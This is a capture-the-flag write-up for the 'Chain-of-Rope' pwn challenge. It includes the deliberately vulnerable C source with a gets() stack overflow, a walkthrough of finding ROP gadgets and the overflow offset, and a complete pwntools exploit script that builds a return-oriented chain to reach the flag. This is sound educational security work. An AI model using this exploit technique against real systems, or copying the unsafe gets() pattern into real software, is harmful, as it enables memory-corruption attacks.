## Chain-of-Rope (80)

### Description

*defund found out about this cool new dark web browser! While he was browsing the dark web he came across this service that sells rope chains on the black market, but they're super overpriced! He managed to get the source code. Can you get him a rope chain without paying?*

*`/problems/2019/chain_of_rope/`*

*`nc shell.actf.co 19400`*

*Author: Aplet123*

**Files:**
* [chain-of-rope](chain-of-rope)
* [chain-of-rope.c](chain-of-rope.c)

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int userToken = 0;
int balance = 0;

int authorize () {
	userToken = 0x1337;
	return 0;
}

int addBalance (int pin) {
	if (userToken == 0x1337 && pin == 0xdeadbeef) {
		balance = 0x4242;
	} else {
		printf("ACCESS DENIED\n");
	}
	return 0;
}

int flag (int pin, int secret) {
	if (userToken == 0x1337 && balance == 0x4242 && pin == 0xba5eba11 && secret == 0xbedabb1e) {
		printf("Authenticated to purchase rope chain, sending free flag along with purchase...\n");
		system("/bin/cat flag.txt");
	} else {
		printf("ACCESS DENIED\n");
	}
	return 0;
}

void getInfo () {
	printf("Token: 0x%x\nBalance: 0x%x\n", userToken, balance);
}

int main() {
	gid_t gid = getegid();
	setresgid(gid, gid, gid);
	setvbuf(stdin, NULL, _IONBF, 0);
	setvbuf(stdout, NULL, _IONBF, 0);
	char name [32];
	printf("--== ROPE CHAIN BLACK MARKET ==--\n");
	printf("LIMITED TIME OFFER: Sending free flag along with any purchase.\n");
	printf("What would you like to do?\n");
	printf("1 - Set name\n");
	printf("2 - Get user info\n");
	printf("3 - Grant access\n");
	int choice;
	scanf("%d\n", &choice);
	if (choice == 1) {
		gets(name);
	} else if (choice == 2) {
		getInfo();
	} else if (choice == 3) {
		printf("lmao no\n");
	} else {
		printf("I don't know what you're saying so get out of my black market\n");
	}
	return 0;
}
```

---

### Solution

The program represents a black rope market place and presents the user with a few options. We can set a name, get user info and grant access. By looking at the source code we probably want to set the name since that leads to running `gets()` _(line 50)_.

Let's check the executable with `checksec` so we know what we can and can not do:

```
$ checksec --file chain-of-rope
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```

No stack canary so we can probably overwrite the return address of `main()`. We have a very convenient `system("/bin/cat flag.txt")` in `flag()` but in order to reach this line we have to modify the variables `userToken` and `balance` because they are checked before the call to `system`. We also have to pass a pin and a secret to the call to `flag()`

The `userToken` is set to `0x1337` in the function `authorize()`, which is the value we need it to be in flag.
The `balance` is set to `0x4242` in the function `addBalance(int pin)`, if you pass `0xdeadbeef` as the pin, and if `userToken` is already set to `0x1337`

So the plan is:

1. call `authorize()`
2. call `addBalance(0xdeadbeef)`
3. call `flag(0xba5eba11, 0xbedabb1e)`

Since we can overflow the stack we can easily find and put the addresses of the functions there in the right sequence, but we also have to supply arguments to `addBalance(int pin)` and `flag(int pin, int secret)`.

In `x86_64` the first argument to a function is passed via the `rdi` register and the second via the `rsi` register, so before the call to `addBalance(int pin)` we have to make sure that `rdi=0xdeadbeef`

We can maybe find some ROP-gadgets to helt us with this. Since we can control what is on the stack the most convenient gadget would be:
```
pop rdi
ret
```

With radare 2's `/R` command we can find rop gadgets:

![pop_rdi.png](pop_rdi.png)

Exactly what we wanted.

While we are at it let's see if we can find a gadget to pop rsi which we will need in order to pass `secret` to `flag(int pin, int secret)`:

![pop_rsi.png](pop_rsi.png)

This looks good. Notice the our pop rsi gadget also pops another value from the stack into r15. This means that we will have to add some random value to our payload, that will get popped into r15 which we will never use.

Now that we have a plan we can stat crafting our exploit. Let us start with finding the buffer overflow offset.
Generate debruijn pattern:

```
$ ragg2 -P 100 -r

AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASAATAAUAAVAAWAAXAAYAAZAAaAAbAAcAAdAAeAAfAAgAAh
```

Now we run the program with radare 2: `r2 -A -d chain_of_rope`. `-A` to analyze the binary and `-d` for debug. When prompted for input the first time we type `1` to set the name so we can and oveflow the `name` buffer with the de bruijn pattern and find the offset:

![overflow_offset.png](overflow_offset.png)

Now we just need the addresses of the functions that we want to call. We also do that with radare2:

![function_addresses.png](function_addresses.png)


With all the information we have gathered from the program we can craft the following exploit:

```python
#!/usr/bin/python2

from pwn import *

def main():
    offset          = "A"*56
    func_authorize  = p64(0x0000000000401196)
    func_addBalance = p64(0x00000000004011ab)
    func_flag       = p64(0x00000000004011eb)
    pop_rdi         = p64(0x0000000000401403)
    pop_rsi         = p64(0x0000000000401401)

    balance_pin     = p64(0x00000000deadbeef)
    flag_pin        = p64(0x00000000ba5eba11)
    flag_secret     = p64(0x00000000bedabb1e)

    whatever        = p64(0x6666666666666666)

    payload = offset        + \
            func_authorize  + \
            pop_rdi         + \
            balance_pin     + \
            func_addBalance + \
            pop_rdi         + \
            flag_pin        + \
            pop_rsi         + \
            flag_secret     + \
            whatever        + \
            func_flag

    conn = remote('shell.actf.co',19400)

    conn.recvuntil("access\n")

    conn.sendline("1\n")
    conn.sendline(payload)

    conn.recvline()
    flag = conn.recvline()
    print flag

if __name__ == "__main__":
    main()
```
